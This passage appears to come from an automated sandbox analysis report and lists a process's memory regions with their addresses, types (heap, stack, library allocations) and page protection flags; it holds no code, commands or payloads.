page read and write
|
||
|
5FC9000
|
heap
|
page read and write
|
||
|
82A3000
|
heap
|
page read and write
|
||
|
857E000
|
stack
|
page read and write
|
||
|
21870000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
24407F20000
|
heap
|
page read and write
|
||
|
72B0000
|
heap
|
page execute and read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
|
32CF000
|
stack
|
page read and write
|
||
|
46C1000
|
trusted library allocation
|
page read and write
|
||
|
71B8000
|
heap
|
page read and write
|
||
|
2AE4000
|
heap
|
page read and write
|
||
|
24420638000
|
heap
|
page read and write
|
||
|
4716000
|
heap
|
page read and write
|
||
|
2440868C000
|
trusted library allocation
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
8640000
|
direct allocation
|
page read and write
|
||
|
5FB6000
|
heap
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
2B2E000
|
stack
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
244206D7000
|
heap
|
page execute and read and write
|
||
|
5FA5000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
2440900D000
|
trusted library allocation
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
4D22000
|
heap
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
7265000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
7FFD34644000
|
trusted library allocation
|
page read and write
|
||
|
26D9000
|
stack
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
4538000
|
trusted library allocation
|
page read and write
|
||
|
24420991000
|
heap
|
page read and write
|
||
|
2981000
|
heap
|
page read and write
|
||
|
244205B2000
|
heap
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
F7A327E000
|
stack
|
page read and write
|
||
|
22020000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
7EFD000
|
stack
|
page read and write
|
||
|
5DB0000
|
direct allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
4430000
|
trusted library allocation
|
page read and write
|
||
|
2E3B000
|
heap
|
page read and write
|
||
|
2ADE000
|
unkown
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
21040000
|
direct allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
2E3B000
|
heap
|
page read and write
|
||
|
2442097B000
|
heap
|
page read and write
|
||
|
2DC8000
|
heap
|
page read and write
|
||
|
4690000
|
heap
|
page execute and read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
2186F000
|
stack
|
page read and write
|
||
|
471B000
|
trusted library allocation
|
page read and write
|
||
|
4D0B000
|
heap
|
page read and write
|
||
|
244088F9000
|
trusted library allocation
|
page read and write
|
||
|
F7A2A7E000
|
stack
|
page read and write
|
||
|
2440A300000
|
trusted library allocation
|
page read and write
|
||
|
4D15000
|
heap
|
page read and write
|
||
|
21C81000
|
heap
|
page read and write
|
||
|
244088E2000
|
trusted library allocation
|
page read and write
|
||
|
21D81000
|
heap
|
page read and write
|
||
|
21D81000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
56CB000
|
trusted library allocation
|
page read and write
|
||
|
74EB000
|
stack
|
page read and write
|
||
|
21EEC000
|
heap
|
page read and write
|
||
|
24408035000
|
heap
|
page read and write
|
||
|
2D8E000
|
heap
|
page read and write
|
||
|
24406609000
|
heap
|
page read and write
|
||
|
4D00000
|
heap
|
page read and write
|
||
|
6DE8000
|
heap
|
page read and write
|
||
|
21D16000
|
heap
|
page read and write
|
||
|
5D50000
|
heap
|
page read and write
|
||
|
4D1C000
|
heap
|
page read and write
|
||
|
224FC000
|
unclassified section
|
page execute and read and write
|
||
|
5F66000
|
heap
|
page read and write
|
||
|
77A0000
|
heap
|
page read and write
|
||
|
4695000
|
heap
|
page execute and read and write
|
||
|
269C000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
6D0D000
|
stack
|
page read and write
|
||
|
21AEE000
|
stack
|
page read and write
|
||
|
F7A3CCE000
|
stack
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page readonly
|
||
|
21CF9000
|
heap
|
page read and write
|
||
|
2AE5000
|
heap
|
page read and write
|
||
|
2FCC000
|
heap
|
page read and write
|
||
|
5EB0000
|
direct allocation
|
page read and write
|
||
|
5FBB000
|
heap
|
page read and write
|
||
|
6B8D000
|
stack
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
2A48000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
4971000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
15D000
|
stack
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
24409019000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
7FFD34822000
|
trusted library allocation
|
page read and write
|
||
|
443D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2980000
|
heap
|
page readonly
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
244205FE000
|
heap
|
page read and write
|
||
|
7FFD347F1000
|
trusted library allocation
|
page read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
2440A1E0000
|
trusted library allocation
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
4D36000
|
heap
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
4711000
|
heap
|
page read and write
|
||
|
4D01000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
2D8D000
|
heap
|
page read and write
|
||
|
24406530000
|
heap
|
page read and write
|
||
|
8660000
|
direct allocation
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
6CCA000
|
stack
|
page read and write
|
||
|
4465000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F0B000
|
heap
|
page read and write
|
||
|
21F1B000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
2F22000
|
heap
|
page read and write
|
||
|
24406658000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
4B29000
|
heap
|
page read and write
|
There are 772 hidden memdumps, click here to show them.